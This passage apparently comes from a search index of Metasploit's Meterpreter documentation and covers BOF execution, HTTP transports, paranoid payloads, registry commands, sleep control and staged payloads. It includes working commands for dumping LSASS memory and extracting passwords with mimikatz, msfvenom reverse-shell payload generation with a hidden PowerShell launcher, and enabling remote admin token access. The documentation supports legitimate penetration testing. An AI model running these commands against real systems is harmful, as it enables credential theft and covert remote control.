    "content": "The compile option will use a local mingw instance to compile the input file into a COFF file for execution. The standard beacon.h file will be in the include path automatically. In this case, the input file is treated as a C source file instead of compiled data. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#compile",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#compile"
  },"616": {
    "doc": "ExecuteBof Command",
    "title": "Entry Point",
    "content": "Once loaded the loader will call the BOF entry point. By default, this value is go. The entry point option can change it to another valid function to call instead. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#entry-point",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#entry-point"
  },"617": {
    "doc": "ExecuteBof Command",
    "title": "Argument Format-String",
    "content": "The execute_bof command is capable of serializing arguments to be sent to the BOF for execution. The user must define the data type of each argument that the BOF file is expecting to see. This information would come from either reading the BOF’s documentation or source code. Incorrectly specifying the arguments or omitting them entirely can result in the BOF crashing and the Meterpreter session dying. BOF argument types are defined in the format string argument with -f / --format-string. The following table describes each of the types. | Type | Description | Unpack With (C) | . | b | binary data (e.g. 01020304, file:/path/to/file.bin)1 | BeaconDataExtract | . | i | 32-bit integer (e.g. 0x1234, 5678)2 | BeaconDataInt | . | s | 16-bit integer (e.g. 0x1234, 5678)2 | BeaconDataShort | . | z | null-terminated utf-8 string | BeaconDataExtract | . | Z | null-terminated utf-16 string | (wchar_t *)BeaconDataExtract | . 1 Binary data arguments are specified as either a stream of hex characters or as the path to a file local to the Metasploit Framework instance. In the case of a file path, it must be prefixed with file:. 2 Integer arguments are specified as either decimal or hexadecimal literals. Unknown arguments are treated as BOF arguments. Additionally, any arguments after the -- terminator are explicitly treated as BOF arguments. Using the terminator allows ambiguous arguments such as --help to be forwarded to the BOF instead of being processed locally. The number of BOF arguments to be forwarded must equal the number of characters in the argument format string. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#argument-format-string",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#argument-format-string"
  },"618": {
    "doc": "ExecuteBof Command",
    "title": "Usage Examples",
    "content": "Executing dir, passing the path argument and number of sub-directories to list. meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\\\ 0 Contents of C:\\*: 08/05/2022 15:17 <dir> $Recycle.Bin 08/05/2022 15:16 <junction> Documents and Settings 09/22/2022 08:35 1342177280 pagefile.sys 08/05/2022 16:48 <dir> PerfLogs 09/08/2022 12:51 <dir> Program Files 09/15/2018 05:06 <dir> Program Files (x86) 08/05/2022 15:26 <dir> ProgramData 09/07/2022 10:24 <dir> Python27 08/05/2022 15:16 <dir> Recovery 08/05/2022 15:40 <dir> System Volume Information 08/05/2022 15:16 <dir> Users 09/01/2022 13:49 <dir> Windows 1342177280 Total File Size for 1 File(s) 11 Dir(s) meterpreter > . Executing nanodump. First the PID of LSASS is found, then the argument string is constructed. The output must be written to disk. Once completed, the dump file can be downloaded from the remote host. 
meterpreter > ps lsass Filtering on 'lsass' Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 712 556 lsass.exe x64 0 NT AUTHORITY\\SYSTEM C:\\Windows\\System32\\lsass.exe meterpreter > execute_bof nanodump.x64.o --format-string iziiiiiiiiziiiz 712 nanodump.dmp 1 1 0 0 0 0 0 0 \"\" 0 0 0 \"\" Done, to download the dump run: download nanodump.dmp to get the secretz run: python3 -m pypykatz lsa minidump nanodump.dmp mimikatz.exe \"sekurlsa::minidump nanodump.dmp\" \"sekurlsa::logonPasswords full\" exit meterpreter > download nanodump.dmp [*] Downloading: nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 1.00 MiB of 11.56 MiB (8.65%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 2.00 MiB of 11.56 MiB (17.31%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 3.00 MiB of 11.56 MiB (25.96%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 4.00 MiB of 11.56 MiB (34.62%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 5.00 MiB of 11.56 MiB (43.27%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 6.00 MiB of 11.56 MiB (51.92%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 7.00 MiB of 11.56 MiB (60.58%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 8.00 MiB of 11.56 MiB (69.23%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 9.00 MiB of 11.56 MiB (77.89%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 10.00 MiB of 11.56 MiB (86.54%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 11.00 MiB of 11.56 MiB (95.2%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 11.56 MiB of 11.56 MiB (100.0%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp [*] download : nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp meterpreter > . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#usage-examples",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#usage-examples"
  },"619": {
    "doc": "ExecuteBof Command",
    "title": "References",
    "content": ". | hstechdocs.helpsystems.com/manuals/cobaltstrike for Cobalt Strike’s BOF documentation | beacon.h source code for the BOF API | TrustedSec/COFFLoader for the source code of the loader | trustedsec/CS-Situational-Awareness-BOF for a collection of useful BOFs | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#references",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#references"
  },"620": {
    "doc": "ExecuteBof Command",
    "title": "ExecuteBof Command",
    "content": "This guide outlines how to use the Meterpreter execute_bof command as provided by the bofloader extension. It allows a Meterpreter session to execute “Beacon Object Files” or BOF files for short. A BOF is a Common Object File Format (COFF) executable file with an API of standard functions defined in beacon.h. The bofloader extension is only available for the Windows native Meterpreter, i.e. it is unavailable in the Java Meterpreter even when running on the Windows platform. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html"
  },"621": {
    "doc": "HTTP Communication",
    "title": "HTTP Communication",
    "content": "The Meterpreter payload supports a number of transports, including reverse_http and reverse_https. This document describes how these transports work. The Initial URL . During the generation process for a new reverse_http or reverse_https payload, an initial connect-back URL will be created. This URL will be either “short” or “long” and the 8-bit checksum of this URL will be set to one of the INIT_* constants defined in the UriChecksum mixin. The URL will be generated using the base64url character set. The “short” URL will always be 5 bytes in length while the “long” URL will be between 30 and 128 bytes in length. Which variant is used is determined by the space constraints of the exploit that generates the payload. The “long” URL can also include an embedded Payload UUID. The Connection URL . The HTTP handler within Metasploit will receive the request for the initial URL, determine which INIT_* checksum it correlates to, extract any embedded Payload UUID, and then respond with either the second stage for staged payloads or a new URL for stageless payloads. The new URL is generated by the handler, will embed any Payload UUID that was included in the original request, and will hash to the value defined by the URI_CHECKSUM_CONN constant. Note that characters other than the base64url character set are ignored during calculation of the checksum. The connect URL must be unique between sessions in order for the sessions to function properly. TLS Certificate Pinning . The Meterpreter HTTPS transport supports certificate pinning. This applies to the stageless payloads as well as Meterpreter payloads loaded with the reverse_winhttps stagers. At this time, some of the non-Windows stagers also support certificate pinning, but this is still a work in progress. Certificate pinning is enabled by setting the StagerVerifySSLCert option to true and by extracting a SHA1 hash of the certificate specified in the HandlerSSLCert option. 
The SHA1 hash of the certificate will be verified during the staging process, and also in the handler, if these options are specified in the listener. This feature requires the pre-generation of a unified SSL/TLS certificate in PEM format, with the private key followed by one or more certificates in the chain. If an incoming session connects through a man-in-the-middle proxy that presents a different certificate, the first connection will connect back, but then immediately terminate. The handler will detect a non-responsive connection and close the session automatically. The command below generates a custom unified PEM TLS certificate that works with the HandlerSSLCert option: . $ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \\ -subj \"/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com\" \\ -keyout www.example.com.key \\ -out www.example.com.crt && \\ cat www.example.com.key www.example.com.crt > www.example.com.pem && \\ rm -f www.example.com.key www.example.com.crt . The Application Protocol . Once the Meterpreter connect URL is requested, the actual dispatch loop starts to run. The Meterpreter payload will make repeated requests with an HTTP body consisting of “RECV”. Any queued commands will be returned to the payload, which will process them individually, and return the results in a following request. If no commands were returned as a result of a “RECV” request, the payload will double the interval until the next request, with a maximum that is generally about 10 seconds. Additional details about the configuration of the HTTP transport can be found on the transport control wiki page. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-http-communication.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-http-communication.html"
  },"622": {
    "doc": "Paranoid Mode",
    "title": "Paranoid Mode",
    "content": "In some scenarios, it pays to be paranoid. This also applies to generating and handling Meterpreter sessions. This document walks through the process of implementing a paranoid Meterpreter payload and listener. Create an SSL/TLS Certificate . For best results, use an SSL/TLS certificate signed by a trusted certificate authority. Failing that, you can still generate a self-signed unified PEM using the following command: . $ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \\ -subj \"/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com\" \\ -keyout www.example.com.key \\ -out www.example.com.crt && \\ cat www.example.com.key www.example.com.crt > www.example.com.pem && \\ rm -f www.example.com.key www.example.com.crt . Create a Paranoid Payload . For this use case, we will combine Payload UUID tracking and whitelisting with TLS pinning. For a staged payload, we will use the following command: . $ ./msfvenom -p windows/meterpreter/reverse_winhttps LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat $ head launch-paranoid.bat %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg... A stageless version of this would look like the following: . $ ./msfvenom -p windows/meterpreter_reverse_https LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedStageless -f exe -o launch-paranoid-stageless.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 885314 bytes Saved as: launch-paranoid-stageless.exe . Create a Paranoid Listener . 
A staged payload would need to set the HandlerSSLCert and StagerVerifySSLCert options to enable TLS pinning and IgnoreUnknownPayloads to whitelist registered payload UUIDs: . $ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_winhttps; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j' . A stageless version is only slightly different: . $ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter_reverse_https; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j' . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html"
  },"623": {
    "doc": "Reg Command",
    "title": "Concepts",
    "content": "The Windows registry is used to store configuration settings for both the operating system and software applications. This registry is hierarchical and stores keys and values. Registry keys are similar to folders, and registry values are similar to files. Each registry key path should be unique, and its components are separated by backslashes, similar to a Windows file path. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#concepts",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#concepts"
  },"624": {
    "doc": "Reg Command",
    "title": "Root keys",
    "content": "Every registry key must start from one of the following root keys or abbreviations: . | HKEY_LOCAL_MACHINE or HKLM | HKEY_CURRENT_USER or HKCU | HKEY_USERS or HKU | HKEY_CLASSES_ROOT or HKCR | HKEY_CURRENT_CONFIG or HKCC | HKEY_PERFORMANCE_DATA or HKPD | HKEY_DYN_DATA or HKDD | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#root-keys",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#root-keys"
  },"625": {
    "doc": "Reg Command",
    "title": "Value types",
    "content": "Each value also has an associated type, for example: . | REG_NONE | REG_BINARY | REG_DWORD / REG_DWORD_LITTLE_ENDIAN / REG_DWORD_BIG_ENDIAN - 32-bit number | REG_QWORD / REG_QWORD_LITTLE_ENDIAN - 64-bit number | REG_SZ - String value, terminated with a null byte | REG_EXPAND_SZ - String value which contains unexpanded environment variables, e.g. %APPDATA% | REG_MULTI_SZ - An array of strings. Each string is separated by a null byte, with a final trailing null byte, e.g. line1\\0line2\\0line3\\0\\0 | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#value-types",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#value-types"
  },"626": {
    "doc": "Reg Command",
    "title": "Examples",
    "content": "All of these examples assume you are in a Meterpreter session. To see the latest help information run help reg: . meterpreter &amp;gt; help reg Usage: reg [command] [options] Interact with the target machine's registry. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#examples",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#examples"
  },"627": {
    "doc": "Reg Command",
    "title": "Common mistakes",
    "content": "Escaping keys . Registry keys must be escaped correctly. Windows registry keys use backslashes as path separators. In msfconsole, backslashes and spaces have a special meaning, which means you will need to escape these characters for your key to work as expected. # Valid: Using single quotes around the registry key meterpreter &amp;gt; reg enumkey -k 'HKCU\\Keyboard Layout' # Valid: Escaping the backslash and spaces within the registry key meterpreter &amp;gt; reg enumkey -k HKCU\\\\Keyboard\\ Layout # Invalid examples: The user has not escaped backslashes or spaces correctly: meterpreter &amp;gt; reg enumkey -k HKLM\\SAM meterpreter &amp;gt; reg enumkey -k HKCU\\\\Keyboard Layout . 32/64 bit differences . The result of your registry queries can be affected by whether you are interacting with an x86 or x64 Windows session. You can see the type of session you currently have open with the sessions command: . msf6 exploit(windows/smb/psexec) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -&amp;gt; 192.168.123.141:58209 (192.168.123.141) 2 meterpreter x64/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4433 -&amp;gt; 192.168.123.141:58263 (192.168.123.141) . For example, when interacting with an x86 session there are 12 keys listed: . # x86 Session meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows' Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Keys (12): # ... omitted for clarity ... Versus an x64 session which shows 23 keys: . # x64 Session meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows' Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Keys (23): # ... omitted for clarity ... 
If this is problematic either upgrade your session to Meterpreter, or specify the -w flag which will impact the result of queries: . meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows' -w 32 Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Keys (12): # ... omitted for clarity ... meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows' -w 64 Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Keys (23): # ... omitted for clarity ... ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#common-mistakes",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#common-mistakes"
  },"628": {
    "doc": "Reg Command",
    "title": "Enumerate registry keys",
    "content": "Enumerate a root key: . meterpreter &amp;gt; reg enumkey -k HKLM Enumerating: HKLM Keys (6): BCD00000000 HARDWARE SAM SECURITY SOFTWARE SYSTEM . Enumerate a subkey: . meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run Values (2): SecurityHealth VMware User Process . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#enumerate-registry-keys",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#enumerate-registry-keys"
  },"629": {
    "doc": "Reg Command",
    "title": "Query values",
    "content": "Display the registry value and type information: . meterpreter &amp;gt; reg queryval -k 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion' -v ProductName Key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion Name: ProductName Type: REG_SZ Data: Windows 10 Enterprise . Values that are of type REG_EXPAND_SZ, such as `%SystemRoot%\\system32\\drivers\\GM.DLS`, will not automatically be expanded: . meterpreter &amp;gt; reg queryval -k 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DirectMusic' -v 'GMFilePath' Key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DirectMusic Name: GMFilePath Type: REG_EXPAND_SZ Data: C:\\Windows\\system32\\drivers\\GM.DLS . Values that are of type REG_MULTI_SZ will be separated by \\0: . meterpreter &amp;gt; reg queryval -k 'HKLM\\Software\\example' -v 'example multi value with spaces' Key: HKLM\\Software\\example Name: example multi value with spaces Type: REG_MULTI_SZ Data: line1\\0line2\\0line3 . Creating a key . meterpreter &amp;gt; reg createkey -k 'HKLM\\software\\example' Successfully created key: HKLM\\software\\example . Setting a value . Setting a REG_DWORD - use a decimal value: . meterpreter &amp;gt; reg setval -k 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1 Successfully set LocalAccountTokenFilterPolicy of REG_DWORD. Setting a REG_QWORD - use a decimal value: . meterpreter &amp;gt; reg setval -k 'HKLM\\Software\\example' -t REG_QWORD -v qword_example -d 12345678 Successfully set qword_example of REG_QWORD. Setting REG_MULTI_SZ - i.e. an array of strings: . meterpreter &amp;gt; reg setval -k 'HKLM\\Software\\example' -t REG_MULTI_SZ -v 'example multi value with spaces' -d 'line1\\0line2\\0line3' Successfully set example multi value with spaces of REG_MULTI_SZ. Setting REG_BINARY - use lowercase hexadecimal input without the preceding 0x: . 
meterpreter &amp;gt; reg setval -k 'HKLM\\Software\\example' -t REG_BINARY -v binary_example -d deadbeef Successfully set binary_example of REG_BINARY. Deleting a key . meterpreter &amp;gt; reg deletekey -k 'HKLM\\software\\example' Successfully deleted key: HKLM\\software\\example . Deleting a value . meterpreter &amp;gt; reg deleteval -k 'HKLM\\software\\example' -v 'example multi value with spaces' Successfully deleted example multi value with spaces. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#query-values",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#query-values"
  },"630": {
    "doc": "Reg Command",
    "title": "Reg Command",
    "content": "This guide outlines how to use Meterpreter to manipulate the registry, similar to the regedit.cmd program on a Windows machine. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html"
  },"631": {
    "doc": "Reliable Network Communication",
    "title": "Important note about resilient transports",
    "content": "Now that both TCP and HTTP/S payloads contain resiliency features, it’s important to know that exiting Metasploit using exit -y no longer terminates TCP sessions like it used to. If Metasploit is closed using exit -y without terminating existing sessions, both TCP and HTTP/S Meterpreter sessions will continue to run behind the scenes, attempting to connect back to Metasploit on the specified transports. If your intention is to exit Metasploit and terminate all of your sessions, then make sure you run sessions -K first. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html#important-note-about-resilient-transports",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html#important-note-about-resilient-transports"
  },"632": {
    "doc": "Reliable Network Communication",
    "title": "Reliable Network Communication",
    "content": "Of the many recent changes to Meterpreter, reliable network communication is one of the more welcome ones. For a long time, Meterpreter’s communication with Metasploit has been relatively easy to break. Once broken, the session was officially dead, and the only way to get a session back was to replay the original exploitation path and establish a whole new session. In the case of HTTP/S transports, some resiliency features were present. Thanks to their stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems, as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur. Revamped transport implementations have provided support for resiliency even for TCP based communications. Any session that isn’t properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit. It is also possible to control the behaviour of this functionality a little via the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details on those timeout values, please see the timeout documentation. Behind the scenes, Meterpreter now maintains a circular linked list of transports in memory while running. When a transport fails, Meterpreter will shut down and clean up the current transport mechanism resources, and will move on to the next one in the list. From there, Meterpreter will use this transport configuration to attempt to reconnect to Metasploit. It will continue to make these attempts until one of the following occurs: . | The overall session timeout value is reached, at which point the session is terminated. 
| The Retry Total time for the transport is reached, at which point Meterpreter will move on to the next transport. | The connection attempt is successful, and communication is re-established with Metasploit. | . If Meterpreter has a single transport configured, then it will continue to retry on that single transport repeatedly until the session timeout is reached, or a session is successfully created. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html"
  },"633": {
    "doc": "Sleep Control",
    "title": "Silent shells",
    "content": "Noise during an assessment is not necessarily a good thing. With the advent of Meterpreter’s new support and control of multiple transports, Meterpreter has the ability to change transports and therefore change the traffic pattern for communication. However, sometimes this isn’t enough, and sometimes users want to be able to shut the session off temporarily. The sleep command is designed to do just that: make the current Meterpreter session go to sleep for a specified period of time, and then wake up again once that time has expired. During this dormant period, no socket is active, no requests are made, and no responses are given. From the perspective of Metasploit it’s as if the Meterpreter session doesn’t exist. The interface to the sleep command looks like this: . meterpreter &amp;gt; sleep Usage: sleep &amp;lt;time&amp;gt; time: Number of seconds to wait (positive integer) This command tells Meterpreter to go to sleep for the specified number of seconds. Sleeping will result in the transport being shut down and restarted after the designated timeout. As shown, sleep expects to be given a single positive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then call back after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track. The following shows a sample run where Meterpreter is put to sleep for 20 seconds, after which the session reconnects while the handler is still in the background: . meterpreter &amp;gt; sleep 20 [*] Telling the target instance to sleep for 20 seconds ... [+] Target instance has gone to sleep, terminating current session. [*] 10.1.10.35 - Meterpreter session 3 closed. 
Reason: User exit msf exploit(handler) &amp;gt; [*] Meterpreter session 4 opened (10.1.10.40:6005 -&amp;gt; 10.1.10.35:49315) at 2015-06-02 23:00:29 +1000 msf exploit(handler) &amp;gt; sessions -i 4 [*] Starting interaction with 4... meterpreter &amp;gt; getuid Server username: WIN-S45GUQ5KGVK\\OJ . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html#silent-shells",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html#silent-shells"
  },"634": {
    "doc": "Sleep Control",
    "title": "Under the hood",
    "content": "The implementation of this command was made rather simple as a result of the work that was done to support multiple transports. To facilitate this command, all that happens is: . | A transport change is invoked, but the transport that is selected as the “next” transport is the same as the currently active one. | The transport is shut down and the session is closed. | The timeout value is passed to a call to sleep(), forcing the main thread of execution to pause for the allotted period of time. | Execution resumes, and the resumption of connectivity continues in the usual transport switching fashion, only in this case, the transport that is fired up is the one that was just shut down. | . In short, the sleep command is a transport switch to the current transport with a delay. Simple! . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html#under-the-hood",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html#under-the-hood"
  },"635": {
    "doc": "Sleep Control",
    "title": "Sleep Control",
    "content": "There comes a time in the life of many a Meterpreter session when it needs to go quiet for a while. There are many reasons that this might be needed: . | During an assessment, the blue team may have detected suspicious activity, and communication is too noisy. | Long term engagements require long-term shells, but the red team isn’t awake 24 hours a day, and so keeping the communications active the whole time doesn’t make sense. | Users may just want to reduce the number of shells they have to worry about at a given time and want some of them to go away for a while. | . For these reasons, and more, the new sleep command in Meterpreter was created. This document explains what it is and how it works. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html"
  },"636": {
    "doc": "Stageless Mode",
    "title": "What is a staged payload?",
    "content": "A staged payload is simply a payload that is as compact as possible and performs the single task of providing the means for an attacker to upload something bigger. Staged payloads are often used in exploit scenarios due to the fact that binary exploitation often results in very little space for shellcode to be stored. The initial shellcode (often referred to as stage0) may create a new connection back to the attacker’s machine and read a larger payload into memory. Once the payload has been received, stage0 passes control to the new, larger payload. In Metasploit terms, this payload is called reverse_tcp, and the second stage (stage1) might be a standard command shell, or it might be something more complex, such as a Meterpreter shell or a VNC session. There are other staged options such as reverse_https and bind_tcp, both of which provide different transport options for opening the doorway for the second stage. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#what-is-a-staged-payload",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#what-is-a-staged-payload"
  },"637": {
    "doc": "Stageless Mode",
    "title": "Exploitation (recap) with staged Meterpreter",
    "content": "Staged Meterpreter is Meterpreter as we currently know it. Every time we set PAYLOAD windows/meterpreter/... we are asking Metasploit to prepare a payload that is broken into two stages, the second of which gives us a Meterpreter session. For the benefit of those who aren’t familiar with the process of exploitation with staged payloads, let’s take a look at what goes on when we use this payload to exploit a Windows machine using ms08_067_netapi. The following image is a representation of two machines, an attacker and a target. The former is running Metasploit with the ms08_067_netapi exploit configured to use a staged Meterpreter payload that has stage0 set to reverse_tcp using port 4444. The latter is an instance of Windows running a vulnerable implementation of SMB listening on port 445. When the payload is executed, Metasploit creates a listener on the correct port, and then establishes a connection to the target SMB service. Behind the scenes, when the target SMB service receives the connection, a function is invoked which contains a stack buffer that the attacking machine will overflow. The attacking machine then sends data that is bigger than the target expects. This data, which contains stage0 and a small bit of exploit-specific code, overflows the target buffer. The exploit-specific code allows the attacker to gain control over EIP and redirect process execution to the stage0 shellcode. At this point, the attacker has control of execution within the SMB service, but doesn’t really have the ability to do much else with it due to the size constraint. When stage0 (reverse_tcp) executes, it connects back to the attacker on the required port, which is ready and waiting with stage1. In the case of Meterpreter, stage1 is a DLL called metsrv. The metsrv DLL is then sent to the target machine through this reverse connection. This is what is happening when we see the “Sending stage …” message in msfconsole. 
The byte count that is shown in the “Sending stage” message represents the entire metsrv component as well as a configuration block. Once this has been pushed to the target machine, the stage0 shellcode writes it into memory. Once stage1 is in memory, stage0 passes control to it by simply jumping to the location where the payload was written. In the case of metsrv, the first 60(ish) bytes are a clever collection of shellcode that also looks similar to a valid DOS header. This shellcode, when executed, uses Reflective DLL Injection to remap and load metsrv into memory in such a way that allows it to function correctly as a normal DLL without writing it to disk or registering it with the host process. It then invokes DllMain() on this loaded DLL, and the Meterpreter that we know and love takes over. From here, MSF pushes up two Meterpreter extension DLLs: stdapi and priv. Both of these are also reflectively loaded in the same way the original metsrv DLL was. At this point, Meterpreter is now ready and willing to take your commands. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#exploitation-recap-with-staged-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#exploitation-recap-with-staged-meterpreter"
  },"638": {
    "doc": "Stageless Mode",
    "title": "What’s wrong with staged Meterpreter?",
    "content": "Staged Meterpreter, in scenarios like that shown above, is a wonderful thing and works very well. However, there are other scenarios for compromise where this approach is less than ideal. In case you didn’t notice, in order to get a Meterpreter session running in the example scenario we uploaded the following: . | stage0: large buffer of junk plus approximately 350b of shellcode. | stage1: 32bit metsrv DLL approximately 169kb plus the configuration block. | stage2: 32bit stdapi DLL approximately 332kb. | stage3: priv DLL approximately 104kb. | . For a single session, the grand total of 605kb (ish) doesn’t feel like much. It’s certainly nothing compared to the 1mb+ we used to serve up! But when you end up in the situation where many shells come in at once, this adds up very quickly. The most common example of where this falls down is the case where penetration testers are in low-bandwidth or high-latency environments and have pre-generated a staged Meterpreter binary that is then hosted outside of the attacker’s machine. Assessment targets download and invoke this binary, which results in the attacker gaining a Meterpreter shell on the target machine. The data or time cost of uploading metsrv, stdapi and priv for every single shell becomes unwieldy or outright impossible, even for a small number of shells. For large-scale compromise, via approaches such as GPO updates or SCCM packages, handling the volume of incoming connections at once can be bad enough; add the three DLL uploads to this mix and you have a recipe for lost shells and sadness. Nobody likes losing shells. Nobody likes sadness. It’s hard to believe it possible, but in this case the following output could be considered a nightmare. [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] 